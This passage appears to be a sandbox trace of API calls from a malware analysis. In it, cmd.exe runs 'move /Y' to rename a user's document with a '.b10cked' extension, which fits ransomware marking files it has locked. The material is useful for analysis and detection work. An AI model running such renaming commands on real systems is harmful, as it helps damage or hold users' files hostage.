State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.462] GetConsoleOutputCP () returned 0x1b5 [0141.462] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.462] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.463] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.463] GetEnvironmentStringsW () returned 0x340160* [0141.464] FreeEnvironmentStringsW (penv=0x340160) returned 1 [0141.464] GetEnvironmentStringsW () returned 0x340160* [0141.464] FreeEnvironmentStringsW (penv=0x340160) returned 1 [0141.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee3c | out: phkResult=0x14ee3c*=0x40) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x88, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x0, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegCloseKey (hKey=0x40) returned 0x0 [0141.464] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee3c | out: phkResult=0x14ee3c*=0x40) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x40, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: 
lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x1, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x0, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x4, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x4) returned 0x0 [0141.464] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee44, lpData=0x14ee48, lpcbData=0x14ee40*=0x1000 | out: lpType=0x14ee44*=0x0, lpData=0x14ee48*=0x9, lpcbData=0x14ee40*=0x1000) returned 0x2 [0141.464] RegCloseKey (hKey=0x40) returned 0x0 [0141.465] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.465] srand (_Seed=0x5b886370) [0141.465] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" [0141.465] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" [0141.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.465] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.465] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.465] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.465] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.465] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.465] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.466] GetEnvironmentStringsW () returned 0x3422b0* [0141.466] FreeEnvironmentStringsW (penv=0x3422b0) returned 1 [0141.466] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.466] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.466] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.466] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.466] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.466] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.466] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0141.466] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.466] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.466] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc08, lpFilePart=0x14fc04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fc04*="Desktop") returned 0x18 [0141.466] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.466] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.466] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.466] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f984 | out: lpFindFileData=0x14f984) returned 0x33fff0 [0141.467] FindClose (in: hFindFile=0x33fff0 | out: hFindFile=0x33fff0) returned 1 [0141.467] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.467] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.467] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.467] GetEnvironmentStringsW () returned 0x342ad0* [0141.467] FreeEnvironmentStringsW (penv=0x342ad0) returned 1 [0141.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.467] GetConsoleOutputCP () returned 0x1b5 [0141.467] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0141.467] GetUserDefaultLCID () returned 0x409 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd48, cchData=128 | out: lpLCData="0") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd48, cchData=128 | out: lpLCData="0") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd48, cchData=128 | out: lpLCData="1") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.468] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.469] GetConsoleTitleW (in: lpConsoleTitle=0x3308c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0141.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.469] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.470] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.470] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.470] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.470] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.470] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.470] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.470] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.472] GetConsoleTitleW (in: lpConsoleTitle=0x14fa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.473] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.473] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.473] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0141.473] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.473] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.473] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.473] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.473] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.473] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.473] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.473] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.473] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.473] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.473] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.473] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.475] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f7fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f7f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f7f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.475] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.476] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.476] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.476] _wcsicmp (_String1="BmSmSSu.doc", _String2=".") returned 52 [0141.476] _wcsicmp (_String1="BmSmSSu.doc", _String2="..") returned 52 [0141.476] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.476] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14f184, lpFilePart=0x14f16c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x14f16c*="BmSmSSu.doc") returned 0x25 [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0141.477] _wcsicmp (_String1="BmSmSSu.doc", _String2=".") returned 52 [0141.477] _wcsicmp (_String1="BmSmSSu.doc", _String2="..") returned 52 [0141.477] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.477] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14f600, lpFilePart=0x14f398 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x14f398*="BmSmSSu.doc") returned 0x25 [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] SetErrorMode (uMode=0x0) returned 0x0 [0141.477] SetErrorMode (uMode=0x1) returned 0x0 [0141.477] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", nBufferLength=0x104, lpBuffer=0x14f808, lpFilePart=0x14f398 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", lpFilePart=0x14f398*="BmSmSSu.doc.b10cked") returned 0x2d [0141.477] SetErrorMode (uMode=0x0) returned 0x1 [0141.477] SetLastError (dwErrCode=0x0) [0141.477] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc.b10cked")) returned 0xffffffff [0141.477] GetLastError () returned 0x2 [0141.477] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", fInfoLevelId=0x1, lpFindFileData=0x14ed14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ed14) returned 0x330ed0 [0141.478] FindNextFileW (in: hFindFile=0x330ed0, lpFindFileData=0x14ed14 | out: lpFindFileData=0x14ed14) returned 0 [0141.478] GetLastError () returned 0x12 [0141.478] FindClose (in: hFindFile=0x330ed0 | out: hFindFile=0x330ed0) returned 1 [0141.479] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", fInfoLevelId=0x1, lpFindFileData=0x341ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341ad8) returned 0x330ed0 [0141.479] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", nBufferLength=0x104, lpBuffer=0x14efac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked", lpFilePart=0x0) returned 0x2d [0141.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", nBufferLength=0x104, lpBuffer=0x14efac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc", lpFilePart=0x0) returned 0x25 [0141.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc")) returned 0x20 [0141.479] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\bmsmssu.doc.b10cked"), dwFlags=0x3) returned 1 [0141.480] FindClose (in: hFindFile=0x330ed0 | out: hFindFile=0x330ed0) returned 1 [0141.480] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ef60 | out: _Buffer=" 1") returned 9 [0141.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.480] GetFileType (hFile=0x7) returned 0x2 [0142.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.125] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14eeec | out: lpMode=0x14eeec) returned 1 [0142.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef20 | out: lpConsoleScreenBufferInfo=0x14ef20) returned 1 [0142.126] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0142.126] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ef60 | out: lpBuffer=" 1 file(s) 
moved.\r\n") returned 0x1a [0142.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ef44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ef44*=0x1a) returned 1 [0142.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.127] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.127] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.127] SetConsoleInputExeNameW () returned 0x1 [0142.127] GetConsoleOutputCP () returned 0x1b5 [0142.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.128] exit (_Code=0) Process: id = "155" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 